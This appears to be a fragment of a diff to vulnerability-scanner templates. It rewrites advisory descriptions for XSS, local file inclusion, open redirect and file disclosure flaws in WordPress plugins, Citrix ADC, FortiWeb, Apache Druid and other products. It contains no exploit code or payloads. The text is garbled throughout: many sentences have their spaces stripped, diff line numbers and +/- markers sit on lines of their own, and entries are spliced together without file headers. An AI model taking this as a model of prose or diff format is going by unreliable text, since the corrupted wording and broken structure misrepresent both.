description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query).
7
+
description: |
8
+
WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO.
description: AnissuewasdiscoveredinAgentejo Cockpit 0.10.2.Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content,creatingaReflectedXSSattackvector.
7
+
description: Agentejo Cockpit 0.10.2containsareflectedcross-sitescriptingvulnerabilityduetoinsufficient sanitization of the to parameter in the /auth/login route,which allows for injection of arbitrary JavaScript code into a web page's content.
name: PHPGurukulHospital Management System - Cross-Site Scripting
5
5
author: TenBird
6
6
severity: medium
7
7
description: |
8
-
PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities.
8
+
PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
AreflectedXSSvulnerabilityhasbeendiscoveredinthepubliclyaccessibleafr.phpdeliveryscriptofRevive Adserver <=5.0.3 byJacopoTediosi.Therearecurrentlynoknownexploits: the sessionidentifiercannotbeaccessedasitisstoredinanhttp-onlycookieasofv3.2.2. On older versions, however,underspecificcircumstances,it couldbe possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escapinginaJavaScriptcontext, allowing an attacker to execute arbitrary JS code on the browser of the victim.
7
+
Revive Adserver 5.0.3 andpriorcontainsareflectedcross-sitescriptingvulnerabilityin the publiclyaccessibleafr.phpdeliveryscript. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.
ImproperinputvalidationinCitrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allowsreflectedCrossSiteScripting(XSS).
8
+
Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 containacross-sitescriptingvulnerabilityduetoimproperinputvalidation.
description: Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
description: A reflected cross-site scripting vulnerabilityexists in the url parameter of the /cgi-bin/luci/site_access/ pageontheGryphonTowerrouter'swebinterface. An attacker could exploit this issue by tricking a user into following a specially crafted link, granting the attacker javascript execution inthecontextof the victim's browser.
7
+
description: GryphonTowerrouterwebinterfacecontainsa reflected cross-site scripting vulnerability in the url parameter of the /cgi-bin/luci/site_access/ page. An attacker can exploit this issue by tricking a user into following a specially crafted link, granting the attacker JavaScript execution in the victim's browser.
name: Quiz And Survey Master <7.1.14 -Reflected Cross-Site Scripting
4
+
name: WordPressQuiz and Survey Master <7.1.14 - Cross-Site Scripting
5
5
author: dhiyaneshDK
6
6
severity: medium
7
-
description: Cross-sitescriptingvulnerabilityin Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors."
7
+
description: WordPress Quiz and Survey Master plugin prior to 7.1.14 containsacross-sitescriptingvulnerabilitywhichallows a remote attacker to inject arbitrary script via unspecified vectors.
description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
8
-
arbitrary JavaScript code execution.
7
+
description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the graph parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.
description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
8
-
arbitrary JavaScript code execution.
7
+
description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the device_id parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.
description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
8
-
arbitrary JavaScript code execution.
7
+
description: Advantech R-SeeNet is vulnerable to cross-site scripting via the device_graph_page.php script via the is2sim parameter. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
An improper neutralization of input during web page generation in FortiWeb GUI interface 6.3.0 through 6.3.7 and version before 6.2.4 may allow an unauthenticated,
9
-
remote attacker to perform a reflected cross site scripting attack (XSS) by injecting malicious payload in different vulnerable API end-points.
8
+
FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.
description: JH 404 LoggerWordPress plugin through 1.1 doesn'tsanitisethereferer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript codeintheWordPressdashboard.
7
+
description: WordPressJH 404 Logger plugin through 1.1 containsacross-sitescriptingvulnerability.Referer and path of 404 pagesarenotproperlysanitized when they are output in the WordPressdashboard, which canlead to executing arbitrary JavaScript code.
name: Goto- Tour & Travel <2.0 - ReflectedCross-Site Scripting(XSS)
4
+
name: WordPressGoto Tour & Travel Theme<2.0 - Cross-Site Scripting
5
5
author: daffainfo
6
6
severity: medium
7
-
description: The Goto WordPress theme before 2.0 does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue.
7
+
description: WordPress Goto Tour & Travel theme before 2.0 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize the keywords and start_date GET parameters on its Tour List page.
description: The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius.
7
+
description: WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page.
description: The Stop SpammersWordPress plugin before 2021.9 did not escape user input when blocking requests (such as matching a spam word), outputting it in an attribute after sanitising it to remove HTML tags,whichisnotsufficientandleadtoareflectedCross-SiteScriptingissue.
7
+
description: WordPress Stop Spammers plugin before 2021.9 containsareflectedcross-sitescriptingvulnerability.Itdoes not escape user input when blocking requests (such as matching a spam word), thusoutputting it in an attribute after sanitizing it to remove HTML tags.
description: The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
7
+
description: WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute.
description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor.
description: Apache Druid ingestion system is vulnerable to local file inclusion. The InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
description: EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function.
description: An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1.
A local file disclosure vulnerability in /appConfig/userDB.json of Telos Alliance Omnia MPX Node through 1.5.0+r1 allows attackers to escalate privileges to root and execute arbitrary commands.
